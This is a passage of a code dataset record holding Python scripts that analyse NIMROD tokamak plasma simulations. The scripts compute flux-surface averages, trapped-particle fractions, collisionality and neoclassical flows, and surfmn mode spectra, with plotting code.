pl.subplots()\n#% fig.set_size_inches(8,12)\n#% ax.plot(Rsol[:],Zsol[:],color='k')\n#% ax.plot(Rsep[:],Zsep[:],color='k')\n#% ax.plot(Rwall[:],Zwall[:],color='k')\n#% ax.set(ylabel=\"Z (m)\", xlabel=\"R (m)\")\n#% ax.ticklabel_format(axis='both', style='sci', scilimits=(10**3,10**-3),\n#% useOffset=None, useLocale=None, useMathText=True)\n#% pl.tight_layout()\n#% # find o-point\n#% ax.plot(rzo[0],rzo[1],'o')\n#% return ax\n#%def contourContains(rcon,zcon,rr,zz):\n#% intersections = 0\n#% for ii in range(rcon.size):\n#% if (zcon[ii]-zz)*(zcon[ii-1]-zz)<0. or zcon[ii]-zz==0.:\n#% if rcon[ii]>rr and rcon[ii-1]>rr:\n#% intersections += 1\n#% elif rcon[ii]<rr and rcon[ii-1]<rr:\n#% continue\n#% else:\n#% if rcon[ii]>rcon[ii-1]:\n#% if (rr-rcon[ii-1])/(rcon[ii]-rcon[ii-1]) \\\n#% +(zz-zcon[ii])/(zcon[ii-1]-zcon[ii]) < 1.e-8:\n#% intersections += 1\n#% else:\n#% if (rr-rcon[ii])/(rcon[ii-1]-rcon[ii]) \\\n#% +(zz-zcon[ii-1])/(zcon[ii]-zcon[ii-1]) < 1.e-8:\n#% intersections += 1\n#% if intersections%2 == 0:\n#% return False\n#% else:\n#% return True\n#%\n\nmd=3.3435860e-27\n#%zc=6\n#%mc=1.9944235e-26\nechrg=1.609e-19\nkboltz=echrg\nkb=1.609e-19\neps0=8.85418782e-12\n#%\nnsurf = 150 # FSA surfaces\nbextrema = numpy.zeros([2,nsurf])\nbextrema[0,:] = numpy.inf # min\nbextrema[1,:] = -numpy.inf # max\nbigr = numpy.zeros([nsurf])\nbigr[:] = -numpy.inf # max\n#%\n# Do FSA\ndef basefsa(rzc, y, dy, eval_nimrod, fdict):\n '''\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n Set neq to number of outputs in FSA call\n and fill dy[4:4+neq]\n '''\n isurf=fdict.get('isurf')\n n = eval_nimrod.eval_field('n', rzc, dmode=0, eq=2)\n dy[4] = n[0]*dy[2] # ne\n dy[5] = dy[4] # nd #### n is not a vector for me\n if eval_nimrod.ndnq>1:\n dy[6] = n[2]*dy[2] # nc\n else:\n dy[6] = 0.\n ti = eval_nimrod.eval_field('ti', rzc, dmode=0, eq=2)\n dy[7] = ti[0]*dy[2] # ti\n te = eval_nimrod.eval_field('te', rzc, dmode=0, eq=2)\n dy[8] = te[0]*dy[2] # te\n bf = eval_nimrod.eval_field('b', rzc, dmode=1, eq=2)\n B = Vector(bf, rzc, torgeom=gmt, dmod=1)\n bsq = B.dot(B,dmod=0).data\n dy[9] = bsq*dy[2] # B**2\n dy[10] = (B.hat(dmod=0).dot(grad(B.mag())).data)**2*dy[2] # (b.grad(|B|))**2\n dy[11] = rzc[0]*bf[2]*dy[2] # R B_Phi\n bmag = numpy.sqrt(bsq)\n bextrema[0,isurf] = min(bextrema[0,isurf], bmag)\n bextrema[1,isurf] = max(bextrema[1,isurf], bmag)\n bigr[isurf] = max(bigr[isurf], rzc[0])\n vf = eval_nimrod.eval_field('v', rzc, dmode=0, eq=2)\n dy[12] = vf[2]*dy[2]/rzc[0] # omega\n dy[13] = (vf[0]*bf[0]+vf[1]*bf[1])*dy[2]/numpy.sqrt(bf[0]*bf[0]+bf[1]*bf[1]) # Kpol\n return dy\n#%\ndpow=1.0\nfsafilename = 'fsa.npz'\nif os.path.exists(fsafilename):\n fsaDict = numpy.load(fsafilename)\n dvar = fsaDict['arr_0']\n yvars = fsaDict['arr_1']\n contours = fsaDict['arr_2']\n bextrema = fsaDict['arr_3']\n bigr = fsaDict['arr_4']\nelse:\n dvar, yvars, contours = FSA(eval_nimrod, rzo, basefsa, 10, nsurf=nsurf, \\\n depvar='eta', dpow=dpow, rzx=[1.3, -1.14, 0])\n fsaArr = [dvar, yvars, contours, bextrema, bigr]\n numpy.savez(fsafilename,*fsaArr)\n\n# Determine where the FSA failed\niend=-1\nwhile numpy.isnan(yvars[:,iend]).any():\n iend -= 1\niend += yvars.shape[1]+1\n#%\n# Do FSA for f_passing\ndef trapfsa(rzc, y, dy, eval_nimrod, isurf):\n '''\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n Set neq to number of outputs in FSA call\n and fill dy[4:4+neq]\n '''\n bf = eval_nimrod.eval_field('b', rzc, dmode=0, eq=2)\n B = Vector(bf, rzc, torgeom=gmt, dmod=0)\n bmag = B.mag().data\n dy[4:4+nlam] = numpy.sqrt(1.0 - lam[:]*bmag/bave)\n dy[4+nlam:4+2*nlam] = dy[2]/(dy[4:4+nlam])\n dy[4:4+nlam] *= dy[2]\n dy[4+2*nlam] = dy[2]*bmag/bave\n dy[4+2*nlam+1] = dy[2]*numpy.sqrt((rzc[0]-rzo[0])**2+(rzc[1]-rzo[1])**2)\n return dy\n#%\ntrapfilename = 'trap.npz'\nif os.path.exists(trapfilename):\n trapDict = numpy.load(trapfilename)\n f_pass = trapDict['arr_0']\n eps = trapDict['arr_1']\nelse:\n # Arrays for passing/trapped fractions\n # ind 0 - Helander and Sigmar Eq. 11.24\n # f_t = 1 - (3/4)*int_0^(Bave/Bmax) dlambda lambda/<SQRT(1-lambda*B/Bave)>\n # ind 1 - Lin-Liu and Miller (1995)\n # f_tl = 1 - (3/4)*int_0^(Bave/Bmax) dlambda lambda*<1/SQRT(1-lambda*B/Bave)>\n # ind 2 - f_tu from Lin-Liu and Miller (1995)\n # f_tu = 1 - (3/4)*int_0^(Bave/Bmax) dlambda lambda/SQRT(1-lambda*<B/Bave>)\n # int 3 - f_te from inverse aspect ratio as in B5\n # f_c ~ 1 - 1.46*sqrt(eps) + 0.46*eps*sqrt(eps)\n f_pass = numpy.zeros([4,iend])\n eps = numpy.zeros([iend])\n # integrate from 0 to bmax\n for ii in range(iend):\n nlam = 100\n lam, weights = numpy.polynomial.legendre.leggauss(nlam)\n bave = numpy.sqrt(yvars[5,ii]) # sqrt(<B^2>)\n lam += 1\n lam *= bave/(2.0*bextrema[1,ii])\n weights *= bave/(2.0*bextrema[1,ii])\n rzp = [contours[0,0,ii], contours[1,0,ii], 0]\n intgr, contour = FSA(eval_nimrod, rzo, trapfsa, 2*nlam+2, nsurf=1, depvar='eta', rzp=rzp)\n f_pass[0,ii] = 0.75*numpy.sum(weights*lam/intgr[0:nlam])\n f_pass[1,ii] = 0.75*numpy.sum(weights*lam*intgr[nlam:2*nlam])\n f_pass[2,ii] = 0.75*numpy.sum(weights*lam/numpy.sqrt(1.0-lam*intgr[2*nlam]))\n eps[ii] = intgr[2*nlam+1]/rzo[0]\n f_pass[3,ii] = 1 + (-1.46 + 0.46*eps[ii])*numpy.sqrt(eps[ii])\n print(ii,dvar[1,ii],f_pass[:,ii])\n trapArr = [f_pass,eps]\n numpy.savez(trapfilename,*trapArr)\nf_trap = 1.0 - f_pass[:,:]\n\n#%#import IPython; IPython.embed()\n\n# set fields as views to the arrays\nne = yvars[0,:iend]\nnd = yvars[1,:iend]\n#nc = yvars[2,:iend]\nti = yvars[3,:iend]\nte = yvars[4,:iend]\nfsabsq = yvars[5,:iend]\nfsabdgrBsq = yvars[6,:iend]\nrbphi = yvars[7,:iend]\nomega = yvars[8,:iend]\nkpol = yvars[9,:iend]\nrhon = dvar[1,:iend]\npsi = dvar[2,:iend]\npsix = dvar[2,-1]\nq = numpy.fabs(dvar[7,:iend])\nbigr = bigr[:iend]\n#%\npn.plot_scalar_line(None, psi, flabel=r'\\psi',\n xvar=rhon, xlabel=r'\\rho_N', ylabel='',legend_loc='upper left')\n#%\n# Plot trapped fraction\npn.plot_scalar_line(None, f_trap[0,:], flabel=r'f_t',\n f2=f_trap[1,:], f2label=r'f_{tl}',\n f3=f_trap[2,:], f3label=r'f_{tu}',\n f4=f_trap[3,:], f4label=r'f_{t\\epsilon}',\n xvar=rhon, xlabel=r'\\rho_N', ylabel='',\n style='varied',legend_loc='upper left')\n\n# Plot fsa quants\npn.plot_scalar_line(None, fsabsq, flabel=r'\\langle B^2 \\rangle',\n xvar=rhon, xlabel=r'\\rho_N', ylabel='',legend_loc='upper left')\npn.plot_scalar_line(None, fsabdgrBsq, flabel=r'\\langle(\\mathbf{b}\\cdot\\nabla B)^2\\rangle',\n xvar=rhon, xlabel=r'\\rho_N', ylabel='',legend_loc='upper right')\nfsa_approx = eps**2/(2*rzo[0]**2*q**2)\npn.plot_scalar_line(None, fsabdgrBsq/fsabsq,\n flabel=r'\\langle(\\mathbf{b}\\cdot\\nabla B)^2\\rangle/\\langle B^2 \\rangle',\n f2=fsa_approx, f2label='\\epsilon^2/(2 R_0^2 q^2)',\n xvar=rhon, xlabel=r'\\rho_N', ylabel='m^{-2}',legend_loc='upper right')\n\n#%# computed quantities\n#%### nustar ###\n#%\nnc=0\nzc=0\n\nlnLambda=24.-numpy.log(numpy.sqrt(ne/10**6)/te)\nsqrt2 = numpy.sqrt(2)\ncoef = 4.0 * numpy.sqrt(numpy.pi) * echrg**4 * lnLambda \\\n /((4.0 * numpy.pi * eps0)**2 * kb**1.5 * 3.0 * numpy.sqrt(md))\nnui = coef*(nd+sqrt2*nc*zc**2)*lnLambda / numpy.sqrt(ti**3) # A14\nvti = numpy.sqrt(ti*kb/md)\nlambdai = vti/nui # A15\nzstar = nc*zc**2 / nd # A13\ncoef = 5*(1+sqrt2*zstar)/(sqrt2*12.0)*((17.0*zstar/4.0)+205.0/(48.0*sqrt2)) \\\n /(2*zstar**2 + 301*zstar/(48.0*sqrt2)+89/48)\netai00 = md*nd*nui*lambdai**2 # A17\n\n# plot parallel viscosity as a diffusivity\npn.plot_scalar_line(None, etai00/(md*nd), flabel=r'\\eta^i_{00}/(m_d n_d)',\n xvar=rhon, xlabel=r'\\rho_N', ylabel='m^2/s', legend_loc='upper right')\n\nomegati = vti/(rzo[0]*q) # B10\nnustari = f_trap[0,:]/(2.92*f_pass[0,:]) * nui*omegati/vti**2 * fsabsq/fsabdgrBsq # B11\nnustari_aprx = nui*rzo[0]*q/(eps**(1.5)*vti) #\n#%\npn.plot_scalar_line(None, eps, flabel=r'\\epsilon',\n xvar=rhon, xlabel=r'\\rho_N', ylabel='',legend_loc='upper right')\n\n# plot nustar\npn.plot_scalar_line(None, nustari, flabel=r'\\nu_*',\n f2=nustari_aprx, f2label=r'R_0 q \\nu_i / \\epsilon^{3/2} v_{Ti}',\n f3=eps**(-1.5), f3label=r'\\epsilon^{-3/2}',\n xvar=rhon, xlabel=r'\\rho_N', ylabel='',\n style='varied',legend_loc='upper right')\n#%\n#%### IOL quants ###\n#%\n#%# Compute the electric potential\n#%def int_enorm(delta, rzst, norm):\n#% '''\n#% Integrand for E normal to compute electric potential.\n#% '''\n#% rz = rzst + norm*delta\n#% e = eval_nimrod.eval_field('e', rz, dmode=0, eq=2)\n#% return numpy.dot(e[0:3],norm)\n#%norm = numpy.array([contours[0,0,iend]-contours[0,0,0],\n#% contours[1,0,iend]-contours[1,0,0],0.0])\n#%norm = norm/numpy.linalg.norm(norm)\n#%pot = numpy.zeros([iend])\n#%delta0 = 0.0\n#%rzst = rzo\n#%for ii in range(iend):\n#% rzp = numpy.array([contours[0,0,ii],contours[1,0,ii],0.0])\n#% delta1 = numpy.linalg.norm(rzst-rzp)\n#% pot[ii], err = quad(int_enorm, delta0, delta1, args=(rzst, norm))\n#% #print(rzp,delta1,pot[ii],err)\n#% delta0 = delta1\n#%pot = numpy.cumsum(pot)\n#%# plot the potential\n#%#pn.plot_scalar_line(None, pot, flabel=r'\\Phi',\n#%# xvar=rhon, xlabel=r'\\rho_N', ylabel='V',legend_loc='upper left')\n#%# Make a spline vs psi\n#%splpot = UnivariateSpline(numpy.fabs(psi), pot, k=4, s=0)\n#%d2pot = splpot.derivative(n=2)(numpy.fabs(psi))\n#%#pn.plot_scalar_line(None, d2pot, flabel=r'\\Phi^{\\prime \\prime}',\n#%# xvar=rhon, xlabel=r'\\rho_N', ylabel='V/T^2m^4',legend_loc='upper left')\n#%\n#%fval = eval_nimrod.eval_field('b', rzo, dmode=0, eq=2)\n#%B0 = Vector(fval, rzo, torgeom=gmt, dmod=0)\n#%omega0 = echrg*B0.mag().data/md\n#%S = 1.0 + (rbphi/omega0)**2 * (echrg*d2pot/md)\n#%#pn.plot_scalar_line(None, S, flabel=r'S',\n#%# xvar=rhon, xlabel=r'\\rho_N', ylabel='',legend_loc='lower left')\n#%omegai = echrg*bextrema[0,:iend]/md\n#%term1 = nustari**0.25\n#%term2 = omegai*numpy.sqrt(S)/(rbphi*vti*numpy.sqrt(2.0*eps))*numpy.fabs(psi-psix)\n#%#pn.plot_scalar_line(None, term1, flabel=r'\\nu_*^{1/4}',\n#%# f2=term2, f2label=r'\\Omega_i \\sqrt{|S|} |\\psi - \\psi_x| / F v_{Ti} \\sqrt{2\\epsilon}',\n#%# xvar=rhon, xlabel=r'\\rho_N', ylabel='',\n#%# legend_loc='upper right')\n#%dndtorb = -2.25*nd*nui/numpy.sqrt(numpy.pi*2.0*S*eps) \\\n#% *numpy.exp(-(term1+term2)**2.0)\n#%S0 = 1.0\n#%term02 = omegai*numpy.sqrt(S0)/(rbphi*vti*numpy.sqrt(2.0*eps))*numpy.fabs(psi-psix)\n#%dndtorb0 = -2.25*nd*nui/numpy.sqrt(numpy.pi*2.0*S0*eps) \\\n#% *numpy.exp(-(term1+term2)**2.0)\n#%#pn.plot_scalar_line(None, dndtorb, flabel=r'\\langle\\partial n / \\partial t\\rangle_{orb}',\n#%# f2=dndtorb0, f2label=r'\\langle\\partial n / \\partial t\\rangle_{orb} E=0',\n#%# xvar=rhon, xlabel=r'\\rho_N', ylabel='m^{-3} s^{-1}',\n#%# legend_loc='lower left')\n#%\n#%dr=0.01 # 1cm estimated\n#%jorbBtor = echrg*dr*dndtorb*rbphi/bigr # estimate, be more careful with BPhi\n#%#pn.plot_scalar_line(None, jorbBtor, flabel=r'e \\Gamma_{orb} B_{\\Phi}',\n#%# xvar=rhon, xlabel=r'\\rho_N', ylabel='N m^{-3}',\n#%# legend_loc='lower left')\n#%\n\n### NC poloidal flow ###\n\nD = 6.0/5.0 * (2.0*zstar**2+301.0*zstar/(sqrt2*48.0)+89.0/48.0)\nnuitauii = 1.0/sqrt2 + zstar\ntauii = nuitauii/nui\nK00iB = (zstar + sqrt2-numpy.log(1+sqrt2))/nuitauii\nK01iB = (zstar + 1.0/sqrt2)/nuitauii # isn't this just 1?\nK11iB = (2.0*zstar + 9.0/(4.0*sqrt2))/nuitauii\nK00iP = numpy.sqrt(numpy.pi)\nK01iP = 3 * numpy.sqrt(numpy.pi)\nK11iP = 12 * numpy.sqrt(numpy.pi)\nK00iPS = (17.0*zstar/4.0 + 205.0/(sqrt2*48.0))/D\nK01iPS = (7.0/2.0)*(23.0*zstar/4.0 + 241.0/(sqrt2*48.0))/D\nK11iPS = (49.0/4.0)*(33.0*zstar/4.0 + 325.0/(sqrt2*48.0))/D\nK00itot = K00iB/(1.0 + numpy.sqrt(nustari) + 2.92*nustari*K00iB/K00iP) \\\n /(1.0 + 2.0*K00iP/(3.0*omegati*tauii*K00iPS))\nK01itot = K01iB/(1.0 + numpy.sqrt(nustari) + 2.92*nustari*K01iB/K01iP) \\\n /(1.0 + 2.0*K01iP/(3.0*omegati*tauii*K01iPS))\nK11itot = K11iB/(1.0 + numpy.sqrt(nustari) + 2.92*nustari*K11iB/K11iP) \\\n /(1.0 + 2.0*K11iP/(3.0*omegati*tauii*K11iPS))\nmuiratio = 5.0/2.0 - K01itot/K00itot\nmui00 = K00itot\nmui01 = 5.0/2.0*K00itot - K01itot\nmui11 = K11itot - 5.0*K01itot + 25.0/4.0*K00itot\nnui11 = sqrt2 # lots of assumptions here\ncsharp = 1.0/(1.0+mui11-mui01*muiratio)/nui11\nsplti = UnivariateSpline(rhon, ti, k=4, s=0)\nsplpsi = UnivariateSpline(rhon, psi, k=4, s=0)\ndtidpsi = splti.derivative(n=1)(rhon)/splpsi.derivative(n=1)(rhon)\npn.plot_scalar_line(None, dtidpsi, flabel=r'\\partial T_i / \\partial \\psi',\n xvar=rhon, xlabel=r'\\rho_N', ylabel=r'eV/Tm^2',\n legend_loc='upper left')\nU0itheta = -csharp*muiratio*rbphi/(echrg*fsabsq)*kboltz*dtidpsi\n\n#%slicefileName='../../haskey/slice_164988.3525'\n#%rfile = readRaw(slicefileName)\n#%fitfileName='../../haskey/fit_164988.3525'\n#%ffile = pfileReader.pfileReader(fitfileName)\n#%vpolcfit = ffile.getPfileData('V_pol_12C6_FIT(m/s)')\n#%vpolcdat = rfile['V_pol_12C6_SLICE(m/s)']\n#%splvpfit = UnivariateSpline(vpolcfit[0], vpolcfit[1], k=4, s=0)\n#%v0ipol = numpy.zeros(iend)\n#%Uitheta = numpy.zeros(iend)\n#%fsaNCforce = numpy.zeros(iend)\n#%for ii in range(iend):\n#% rz = numpy.array([bigr[ii], 0, 0])\n#% bf = eval_nimrod.eval_field('b', rz, dmode=1, eq=2)\n#% v0ipol[ii] = bf[1]*U0itheta[ii]\n#% B = Vector(bf, rzo, torgeom=gmt, dmod=1)\n#% bgrB = B.hat(dmod=0).dot(grad(B.mag()))\n#% Uitheta[ii] = splvpfit(rhon[ii])/bf[1]\n#% fsaNCforce[ii] = md*nd[ii]*mui00[ii]*(fsabsq[ii]/fsabdgrBsq[ii])*(bgrB.data)**2*(Uitheta[ii]-U0itheta[ii])\n#%#pn.plot_scalar_line(None, U0itheta, flabel=r'U^0_{i\\theta}',\n#%# #f2=Uitheta, f2label=r'U_{i\\theta}\\;C6\\;CER\\;fit',\n#%# xvar=rhon, xlabel=r'\\rho_N', ylabel=r'm/sT',\n#%# legend_loc='upper left')\n#%#fig_size = [12,6.75]\n#%#fig, ax = pl.subplots(figsize=fig_size)\n#%#ax.errorbar(vpolcdat[0],vpolcdat[1],yerr=vpolcdat[2],fmt='x',color='b', label='C6 CER measurements')\n#%#ax.plot(vpolcfit[0],vpolcfit[1],color='r',label='C6 CER fit')\n#%#pn.plot_scalar_line(None, v0ipol, flabel=r'U^0_{i\\theta} B_p\\;(Z=0)',\n#%# xvar=rhon, xlabel=r'\\rho_N', ylabel=r'm/s',\n#%# legend_loc='lower left', ax=ax)\n#%pn.plot_scalar_line(None, fsaNCforce,\n#% flabel=r'm_i n_i \\mu_i \\langle B^2_0 \\rangle (U_{i\\theta} - U_{i\\theta}^0)',\n#% xvar=rhon, xlabel=r'\\rho_N', ylabel=r'N m^{-3}',\n#% legend_loc='upper right')\n#%\n\n\n# Setup FSA quants spline as function of rhon\n#zvars = numpy.zeros((2, )+yvars.shape) # psin,q + yvars\n#zvars[0,:] = dvar[0,:] # psin\n#zvars[1,:] = dvar[7,:] # q\n#zvars[2:,:] = yvars[:,:]\n#splrho = interp1d(rhon, zvars, kind='cubic')\n\n#pn.plot_scalar_line(None, yvars[0,:], flabel=r'p', xvar=dvar[1,:], ylabel=r'pressure (Pa)', xlabel=r'\\rho_N', legend_loc='upper right')\n#pn.plot_scalar_line(None, yvars[1,:], flabel=r'n', xvar=dvar[1,:], ylabel=r'density (m^{-3})', xlabel=r'\\rho_N', legend_loc='upper right')\n\n##2D plots -- forces\n#xres=250; yres=250 # need y=1000\n#grid = pn.grid_2d_gen([1.14, -1.19, 0], [1.14, 1.02, 0], [2.31, -1.19, 0], xres, yres)\n#\n#maskfilename = 'mask'+str(xres)+'x'+str(yres)+'.npy'\n#if os.path.exists(maskfilename):\n# mask = numpy.load(maskfilename)\n#else:\n# mask = numpy.zeros((1,grid.shape[1],grid.shape[2]))\n# for ix in range(grid.shape[1]):\n# for iy in range(grid.shape[2]):\n# if contourContains(Rsep,Zsep,grid[0,ix,iy],grid[1,ix,iy]):\n# mask[0,ix,iy] = 1.0\n# else:\n# mask[0,ix,iy] = numpy.nan\n# numpy.save(maskfilename,mask)\n#\n##fval = eval_nimrod.eval_field('ti', grid, dmode=0, eq=2)\n##ti = Scalar(fval, grid, torgeom=gmt, dmod=0)\n##fval = eval_nimrod.eval_field('n', grid, dmode=1, eq=2)\n##ne = Scalar(fval, grid, torgeom=gmt, dmod=1, nqty=0)\n##nd = Scalar(fval, grid, torgeom=gmt, dmod=1, nqty=1)\n##nc = Scalar(fval, grid, torgeom=gmt, dmod=1, nqty=2)\n#fval = eval_nimrod.eval_field('v', grid, dmode=2, eq=2)\n#v = Vector(fval, grid, torgeom=gmt, dmod=2)\n#fval = eval_nimrod.eval_field('b', grid, dmode=1, eq=2)\n#B = Vector(fval, grid, torgeom=gmt, dmod=1)\n#\n#divv = 2.0/3.0 * div(v)\n#pn.plot_scalar_plane(grid, mask[0]*divv.data, ax=setBdryPlot())\n#BdcvcB = B.dot( curl( v.cross(B) ) ) / B.dot(B)\n#pn.plot_scalar_plane(grid, mask[0]*BdcvcB.data, ax=setBdryPlot())\n#PiParFast = BdcvcB + divv\n#pn.plot_scalar_plane(grid, mask[0]*PiParFast.data, ax=setBdryPlot(), fmin=-10000., fmax=10000.)\n\n# 1D force-balance test\ngrid = pn.grid_1d_gen([1.76821, -0.0188439, 0], [2.7, -0.0188439, 0], 1000)\nfval = eval_nimrod.eval_field('p', grid, dmode=2, eq=1)\np = Scalar(fval, grid, torgeom=gmt, dmod=2)\nfval = eval_nimrod.eval_field('b', grid, dmode=1, eq=1)\nB = Vector(fval, grid, torgeom=gmt, dmod=1)\nfval = eval_nimrod.eval_field('j', grid, dmode=1, eq=1)\nj = Vector(fval, grid, torgeom=gmt, dmod=1)\nfval = eval_nimrod.eval_field('v', grid, dmode=1, eq=1)\nv = Vector(fval, grid, torgeom=gmt, dmod=1)\nfval = eval_nimrod.eval_field('n', grid, dmode=1, eq=1)\nnd = Scalar(fval, grid, torgeom=gmt, dmod=1, nqty=1)\nfval = eval_nimrod.eval_field('ti', grid, dmode=1, eq=1)\nti = Scalar(fval, grid, torgeom=gmt, dmod=1)\n#nc = Scalar(fval, grid, torgeom=gmt, dmod=1, nqty=2)\n# computed quantities\njxb=j.cross(B)\ngrp=p.grad()\nmd=3.3435860e-27\nmc=1.9944235e-26\n#rhovdgrdv = (md*nd+mc*nc)*v.dot(grad(v))\nrhovdgrdv = (md*nd)*v.dot(grad(v))\n\nforce=jxb-grp\npn.plot_vector_line(grid, force.data, flabel=r'Force', f2=jxb.data,\n f2label=r'$J\\times B$',\n f3=grp.data, f3label=r'$\\nabla p$',\n f4=rhovdgrdv.data, f4label=r'$v\\cdot \\nabla v$',\n comp='perp', style='varied',\n legend_loc='lower left', ylabel=r'Force density N/m^3')\n\npn.plot_scalar_line(grid, ti.data, flabel=r'T_i', style='varied',\n legend_loc='lower left', ylabel=r'Temperature eV')\n" }, { "alpha_fraction": 0.5427481532096863, "alphanum_fraction": 0.5967708826065063, "avg_line_length": 30.98257064819336, "blob_id": "14b218a5981999f5060c43b5c0b6bfc596be63d7", "content_id": "429c4033a843423314e1e128965aaa0119fd87e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14679, "license_type": "no_license", "max_line_length": 145, "num_lines": 459, "path": "/surfmnNim/surfmn.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "import time\nimport numpy as np\nfrom scipy.interpolate import interp1d\nfrom matplotlib import ticker\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport math\nfrom fieldIndex import files,R,Z,BRr,BRi,B0R,B0Z,B0T,qcon1,J0T,pd\nfrom fgProfs import rho,qg,irho2,irho3,irho4\n\n\nfgfile='/home/research/ehowell/SCRATCH/166439/03300_q104_flowtesting/orginal_exb/fgprofs.bin'\n\nmrange=10\n\nZ0=Z[files[0]][0,0]\nR0=R[files[0]][0,0]\n\nr_minor=np.sqrt((R[files[0]]-R0)**2+(Z[files[0]]-Z0)**2)\n\n#calculate length along poloidal extent of axisymmetric poloidal flux contour\ns=np.zeros((len(R[files[0]]),len(R[files[0]][0])))\nds=np.zeros((len(R[files[0]]),len(R[files[0]][0])))\nfor i in range(len(s[:,0])):\n for j in range(len(s[0,:])-1):\n ds[i,j]=math.sqrt((R[files[0]][i][j+1]-R[files[0]][i][j])**2+(Z[files[0]][i][j+1]-Z[files[0]][i][j])**2)\n s[i,j+1]=s[i,j]+ds[i,j]\n\n#calculate equilibrium poloidal field for [r,pol] locations\nB0P=np.sqrt((B0R[files[0]])**2+(B0Z[files[0]])**2)\nif J0T[files[0]][0,0]>0: B0P=-B0P\n\n\n\ndqds=(-B0T[files[0]])/(2*math.pi*B0P*R[files[0]]**2)\nq1=np.trapz(dqds,s,axis=1)\njac=q1[:,None]*R[files[0]]**3*B0P/(-B0T[files[0]]) \n\n#calculate straight-field line theta (PEST coordinate, Jim's derivation)\ntheta_str=np.zeros((len(R[files[0]]),len(R[files[0]][0])))\ndtheta_str=np.zeros((len(R[files[0]]),len(R[files[0]][0])))\nfor i in range(len(theta_str[:,0])):\n for j in range(len(theta_str[0,:])-1):\n theta_str[i,j+1]=theta_str[i,j]+1./(q1[i]+1.0e-11)*(ds[i,j]*(-B0T[files[0]][i,j])/(B0P[i,j]*R[files[0]][i,j]**2))\n dtheta_str[i,j]=1./(q1[i]+1.0e-11)*(ds[i,j]*(-B0T[files[0]][i,j])/(B0P[i,j]*R[files[0]][i,j]**2))\n for j in range(len(theta_str[0,:])):\n theta_str[i,j]=theta_str[i,j]-theta_str[i,pd[files[0]]]\n\n\ndFSAAdth=2*math.pi*jac\nFSArea=np.trapz(dFSAAdth,theta_str,axis=1)\n\ndrhodth=2*math.pi*jac*r_minor/(FSArea[:,None]+1.0e-11)\nrho1=np.trapz(drhodth,theta_str,axis=1)\n\nrholcfs=rho1[int(len(rho1)*.75)] \n \nfor i in range(len(rho1)):\n rho1[i]=rho1[i]/rholcfs\n\nfor i in range(len(q1)):\n mid2=(q1[i]+2.)*(q1[i+1]+2.)\n if mid2<0:\n irho12=i\n mid3=(q1[i]+3.)*(q1[i+1]+3.)\n if mid3<0:\n irho13=i\n mid4=(q1[i]+4.)*(q1[i+1]+4.)\n if mid4<0:\n irho14=i\n mid5=(q1[i]+5.)*(q1[i+1]+5.)\n if mid5<0:\n irho15=i\n mid6=(q1[i]+6.)*(q1[i+1]+6.)\n if mid6<0:\n irho16=i\n mid10=(q1[i]+10.)*(q1[i+1]+10.)\n if mid10<0:\n irho110=i\n break\n\n\nmmax=mrange\nmmin=-mrange\nm=np.linspace(mmin,mmax,mmax-mmin+1)\n\nbcnm=np.zeros((len(files),(mmax-mmin+1),len(R[files[0]])))\nbsnm=np.zeros((len(files),(mmax-mmin+1),len(R[files[0]])))\n\nfor l in range(len(bcnm)):\n if files[l]=='xy_slice00.bin':\n multfact=1/5.e-5\n else:\n multfact=1\n for k in range(len(bcnm[0])):\n dbcnmdth=2*np.pi/(FSArea[:,None]+1e-11)*jac*multfact*(BRr[files[l]]*np.cos((mmin+k)*theta_str)-BRi[files[l]]*np.sin((mmin+k)*theta_str))\n dbsnmdth=2*np.pi/(FSArea[:,None]+1e-11)*jac*multfact*(-BRr[files[l]]*np.sin((mmin+k)*theta_str)-BRi[files[l]]*np.cos((mmin+k)*theta_str))\n \n bcnm[l,k]=np.trapz(dbcnmdth,theta_str,axis=1)\n bsnm[l,k]=np.trapz(dbsnmdth,theta_str,axis=1)\n\nbnm=np.sqrt(bcnm**2+bsnm**2)\n#\n\n#plot choices\n\nplotqcon=0\nplotqlin=0\nplotjac=0\nplottheta=0\nplotqcompare=0\nplotFSArea=0\nplotsurf=0\nplotsurf2wall=0\nplotmag=0\nplotmag2wall=0\n\nxyfile=5\n\n#plotting routines\n\nclines=301 #levels of filled contours\nibmax=len(rho[fgfile])+1\n\nif plotqlin==1:\n \n fig,ax=plt.subplots(figsize=(6,6))\n ax.plot(R[files[0]][:,4],q1,color='r',label='surfmn',lw=3)\n ax.plot(R[files[0]][:,4],qcon1[:,4],color='b',label='Fluxgrid',lw=3) \n\n ax.legend(loc=3,fontsize=20)\n\n plt.setp(ax.get_xticklabels(), fontsize=22)\n plt.setp(ax.get_yticklabels(), fontsize=22)\n \n ax.set_xlabel(r'$R\\,({\\rm m})$',fontsize=24)\n ax.set_ylabel(r'$q$',fontsize=24)\n \n plt.savefig('q.png',bbox_inches='tight')\n\nif plotmag2wall==1:\n\n fig,ax=plt.subplots(figsize=(6,6))\n ax.plot(rho1,bnm[xyfile,9,:].real,color='m',label='m=-1',lw=3)\n ax.plot(rho1,bnm[xyfile,8,:].real,color='r',label='m=-2',lw=3)\n ax.plot(rho1,bnm[xyfile,7,:].real,color='b',label='m=-3',lw=3)\n ax.plot(rho1,bnm[xyfile,6,:].real,color='g',label='m=-4',lw=3)\n ax.plot(rho1,bnm[xyfile,5,:].real,color='y',label='m=-5',lw=3)\n ax.plot(rho1,bnm[xyfile,4,:].real,color='lime',label='m=-6',lw=3)\n ax.plot(rho1,bnm[xyfile,11,:].real,color='cyan',label='m=1',lw=3)\n ax.axvline(x=rho1[irho12],lw=3,ls=(0,(3,2)),c='r',label=r'$q=-2$')\n ax.axvline(x=rho1[irho13],lw=3,ls=(0,(3,2)),c='b',label=r'$q=-3$')\n ax.axvline(x=rho1[irho14],lw=3,ls=(0,(3,2)),c='g',label=r'$q=-4$')\n ax.axvline(x=rho1[irho15],lw=3,ls=(0,(3,2)),c='y',label=r'$q=-5$')\n ax.axvline(x=rho1[irho16],lw=3,ls=(0,(3,2)),c='lime',label=r'$q=-5$')\n \n ax.legend(loc=1,ncol=2,fontsize=14)\n \n ax.yaxis.major.formatter._useMathText = True\n ax.ticklabel_format(axis='y', style='sci', scilimits=(-2,-2))\n ax.yaxis.offsetText.set_fontsize(20)\n ax.locator_params(axis='x',nbins=5)\n\n# 